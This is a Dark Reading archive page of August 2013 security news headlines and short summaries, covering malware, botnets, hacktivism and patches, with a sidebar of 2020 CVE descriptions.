Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.

News & Commentary

Content tagged with Vulnerabilities / Threats posted in August 2013
Malicious Chrome Extension Poses As Facebook Video
News  |  8/30/2013  | 
As malware attacks targeting browser extensions become more common, security researchers advise users to be more careful about installing extensions and to regularly review permissions.
Kelihos Botnet Taps Spam Blocklists To Hone Attacks
News  |  8/30/2013  | 
Malware taps legitimate anti-spam services from the likes of SpamHaus and Sophos before turning PC into control proxy or spam relay.
Java Malicious App Alert System Tricked
Quick Hits  |  8/30/2013  | 
Developer hacks Java security warnings to display fake app names; Oracle reportedly prepping a fix
IPv6 To Complicate Threat-Intelligence Landscape
News  |  8/30/2013  | 
Reputation-based blacklists could face exponential growth when the number of possible Internet addresses becomes, for all practical purposes, infinite
Windows 8 Picture Passwords Easily Cracked
News  |  8/29/2013  | 
Microsoft's picture gesture authentication system isn't that secure, security researchers say.
No Proof Of Malware In New York Times DNS Hijacking Attack
News  |  8/29/2013  | 
No evidence thus far to confirm that the Syrian Electronic Army embedded malware on redirected Web pages, but investigation continues
Talking Threats With Senior Management
Commentary  |  8/29/2013  | 
Every so often, you get lucky and a senior executives asks you about security. You have some choices as to how to answer the question. Choose wisely
Secure Data, Not Devices
Commentary  |  8/29/2013  | 
As government goes mobile and makes greater use of cloud services, IT leaders must adopt a more data-centric, not device-centric, security approach.
New Security Trend: Bring Your Own Attorney
Commentary  |  8/28/2013  | 
BYOA is not a security joke anymore. There is clearly a need for a cybersecurity community that is well-versed in legal and ethical principles.
Feds Charge Wall Street Traders With Code Theft
News  |  8/28/2013  | 
Three men accused of stealing Flow Traders' proprietary high-frequency trading information and algorithms.
NY Times Caught In Syrian Hacker Attack
News  |  8/28/2013  | 
Hacks amount to "warning shots," threatening more widespread cyberattacks should the U.S. and allies launch military campaign against Syria, warns security expert.
Department Of Energy Cyberattack: 5 Takeaways
News  |  8/27/2013  | 
Exclusive: Outdated, unpatched system blamed for DOE breach, but agency said to be getting its cybersecurity house in order.
Getting The Most Out Of A Security Red Team
News  |  8/27/2013  | 
Justify security expenses and improve defenses through the use of an internal red team
Hackers Target Java 6 With Security Exploits
News  |  8/26/2013  | 
Security experts spot code that attacks vulnerability in Java 6, urge users to upgrade to Java 7 immediately.
Nearly One-Fifth Of Enterprise Operating Systems Not Fully Patched
Quick Hits  |  8/23/2013  | 
Less than half of organizations run malicious code execution prevention tools, Rapid7 survey finds
Hack My Google Glass: Security's Next Big Worry?
Commentary  |  8/23/2013  | 
Wearable computing devices must strike a difficult balance between security and convenience. A recent episode involving Google Glass and malicious QR codes raises questions.
Russia May Block Tor
News  |  8/22/2013  | 
In effort to combat child porn, Russian security forces consider installing filters preventing access to Tor networks. But experts say blocking the anonymizing service could be difficult.
FBI: Anonymous Not Same Since LulzSec Crackdown
News  |  8/22/2013  | 
Bureau says that after "dismantlement of the largest players" in LulzSec, domestic hacktivism remains a shadow of its former self.
How Hacktivists Have Targeted Major Media Outlets
News  |  8/21/2013  | 
From the Washington Post and CNN to the Twitter feeds of the Associated Press and Reuters, hacktivists have news outlets--and their social-media presence--in their crosshairs
Natural Disasters Cause More Downtime Than Hackers
News  |  8/21/2013  | 
Study of 79 Internet and telephony outages in 18 European countries found that storms -- especially snowstorms -- caused significantly longer outages than cyberattacks.
Hacker Leaks 15,000 Twitter Access Credentials, Promises More
News  |  8/21/2013  | 
Twitter users should revoke and reassign access for all third-party Twitter apps to mitigate vulnerability, security expert urges.
Microsoft Windows Defender Stumbles In Malware Tests
News  |  8/21/2013  | 
Microsoft's free anti-virus software came in last among 23 programs at catching known malware in an AV program shootout, says independent testing firm.
Microsoft Patch Problems Underline Trade-Offs For Securing Systems
News  |  8/21/2013  | 
As the software giant works to fix the shortcomings in its latest set of patches, security experts debate whether 'trust the patch' is still the best course
Facebook Declines Bug Bounty, But Crowdsourced Effort Pays
News  |  8/20/2013  | 
Security researchers, unhappy with Facebook's decision to withhold reward, come up with the cash on their own.
Kid Hackers Bag Bug Bounties
News  |  8/19/2013  | 
DEF CON Kid and co-founder of R00tz Asylum also names the mobile apps affected by the 'Time Traveler' class of vulnerabilities she discovered two years ago
Prohibition For 0-Day Exploits
Commentary  |  8/19/2013  | 
The monetization of exploits has been a divisive discussion in the security community for years. Now as governments emerge as the largest market for attack code, will there be a move to regulate the sale of 0-day attacks?
Google's Four Minute Blackout Examined
News  |  8/19/2013  | 
Google hasn't explained Friday's four-minute blackout of all Google services, but experts say a hack attack is not the likely cause.
Tech Insight: DEF CON 21 Highlights Dangers Of Social Engineering
News  |  8/16/2013  | 
Popular contest and presentation show real risks associated with social engineering
Researchers Seek Better Ways To Track Malware's Family Tree
News  |  8/15/2013  | 
Following a program's evolution back to the author may not yet be a reality, but computer scientists are searching for more accurate measures of the relationships between software versions
Don't Underestimate Directory Traversal Attacks
News  |  8/15/2013  | 
Are attackers dot-dot-slashing their way into your data?
Rogue Ad Networks Deliver Malware To Mobile Devices
News  |  8/15/2013  | 
Software developers in search of more income are adopting relatively unknown ad networks, but the frameworks may deliver more than just ads, warn security firms
3 Signs You're Phishing Bait
News  |  8/14/2013  | 
Beware, introverts and overconfident people. Phishers love to fool you, email security researchers say.
Android Malware Being Delivered Via Ad Networks
News  |  8/13/2013  | 
Attackers are using mobile ad network software installed on smartphones to push malicious JavaScript and take control of devices.
Spying Trash Cans Banned
News  |  8/12/2013  | 
Foot-traffic counting scheme spooks London city managers.
Microsoft Plans Critical Patches For Internet Explorer, Exchange
News  |  8/12/2013  | 
Microsoft's security patches Tuesday will fix three critical vulnerabilities, including one that affects all current versions of Internet Explorer.
Attackers' Toolbox Makes Malware Detection More Difficult
News  |  8/12/2013  | 
From virtual-machine detection to taking a 30-minute nap, the array of techniques used by attackers to stymie malware analysis is growing
Report: Google Play Store Infested With Adware
Quick Hits  |  8/12/2013  | 
In study of 8,000 apps on Google Play, nearly 2,000 are flagged as adware, ZScaler says
Black Hat: The Problems Don't Change, But The Solutions Have
Commentary  |  8/9/2013  | 
An increase in attacker capabilities has drawn an innovative response from industry, and emerging research promises more to come
Maltego Gets More 'Teeth'
News  |  8/9/2013  | 
New features in Maltego, an open-source intelligence tool for defenders, allow penetration testers and attackers to gather data on vulnerable systems and manage botnets
Chrome Security Shocker Creates Password Anxiety
News  |  8/8/2013  | 
Google responds to criticism of stored password handling; security experts say Chrome security team is missing the forest for the trees.
30-Second HTTPS Traffic Attack: No Fix
News  |  8/8/2013  | 
Researchers who discovered BREACH vulnerability promise a tool to see if your site is at risk -- but say there's no easy fix.
Timing Attacks On Browsers Leak Sensitive Information
News  |  8/8/2013  | 
Variations in the redraw times of graphical elements could allow an attacker to see sites a user has visited, sensitive information
Medical-Device Flaws Will Take Time To Heal
News  |  8/7/2013  | 
Manufacturers are slow to patch up security issues, despite increasing pressure from patients, researchers and federal agencies
Android Trojan Banking App Targets Master Key Vulnerability
News  |  8/6/2013  | 
Sluggish Android updates put users at risk. Could rising public awareness of the flaw lead carriers and device makers to patch more quickly?
Black Hat: Lessons For SMBs From The Dark Side Of Security
News  |  8/6/2013  | 
Issues affecting large enterprises are the bread and butter of Black Hat, but even smaller firms have something to learn
Android One-Click Google Apps Access Cracked
News  |  8/5/2013  | 
Hackers could intercept Android users' unique authentication token and gain unauthorized access to Google Apps, Gmail, Drive and other services.
Water-Utility Honeynet Illuminates Real-World SCADA Threats
News  |  8/2/2013  | 
After a researcher constructs a fake water-utility network and puts it online, attackers quickly target the systems
iOS Weaknesses Allow Attacks Via Trojan Chargers
News  |  8/1/2013  | 
Using weaknesses in Apple's flagship operating system, a simple computer disguised as a charging station can pair with, and then install malware on, any iPhone or iPad that connects to it
Creating Browser-Based Botnets Through Online Ad Networks
News  |  8/1/2013  | 
Researchers demonstrate how ads invoking JavaScript on viewers' browsers en masse could create untraceable networks to wreak DDoS damage


COVID-19: Latest Security News & Commentary
Dark Reading Staff 9/25/2020
9 Tips to Prepare for the Future of Cloud & Network Security
Kelly Sheridan, Staff Editor, Dark Reading,  9/28/2020
Attacker Dwell Time: Ransomware's Most Important Metric
Ricardo Villadiego, Founder and CEO of Lumu,  9/30/2020
Register for Dark Reading Newsletters
White Papers
Video
Cartoon
Current Issue
Special Report: Computing's New Normal
This special report examines how IT security organizations have adapted to the "new normal" of computing and what the long-term effects will be. Read it and get a unique set of perspectives on issues ranging from new threats & vulnerabilities as a result of remote working to how enterprise security strategy will be affected long term.
Flash Poll
How IT Security Organizations are Attacking the Cybersecurity Problem
How IT Security Organizations are Attacking the Cybersecurity Problem
The COVID-19 pandemic turned the world -- and enterprise computing -- on end. Here's a look at how cybersecurity teams are retrenching their defense strategies, rebuilding their teams, and selecting new technologies to stop the oncoming rise of online attacks.
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
CVE-2020-25288
PUBLISHED: 2020-09-30
An issue was discovered in MantisBT before 2.24.3. When editing an Issue in a Project where a Custom Field with a crafted Regular Expression property is used, improper escaping of the corresponding form input's pattern attribute allows HTML injection and, if CSP settings permit, execution of arbitra...
CVE-2020-25781
PUBLISHED: 2020-09-30
An issue was discovered in file_download.php in MantisBT before 2.24.3. Users without access to view private issue notes are able to download the (supposedly private) attachments linked to these notes by accessing the corresponding file download URL directly.
CVE-2020-25830
PUBLISHED: 2020-09-30
An issue was discovered in MantisBT before 2.24.3. Improper escaping of a custom field's name allows an attacker to inject HTML and, if CSP settings permit, achieve execution of arbitrary JavaScript when attempting to update said custom field via bug_actiongroup_page.php.
CVE-2020-26159
PUBLISHED: 2020-09-30
In Oniguruma 6.9.5_rev1, an attacker able to supply a regular expression for compilation may be able to overflow a buffer by one byte in concat_opt_exact_str in src/regcomp.c .
CVE-2020-6654
PUBLISHED: 2020-09-30
A DLL Hijacking vulnerability in Eaton's 9000x Programming and Configuration Software v 2.0.38 and prior allows an attacker to execute arbitrary code by replacing the required DLLs with malicious DLLs when the software try to load vci11un6.DLL and cinpl.DLL.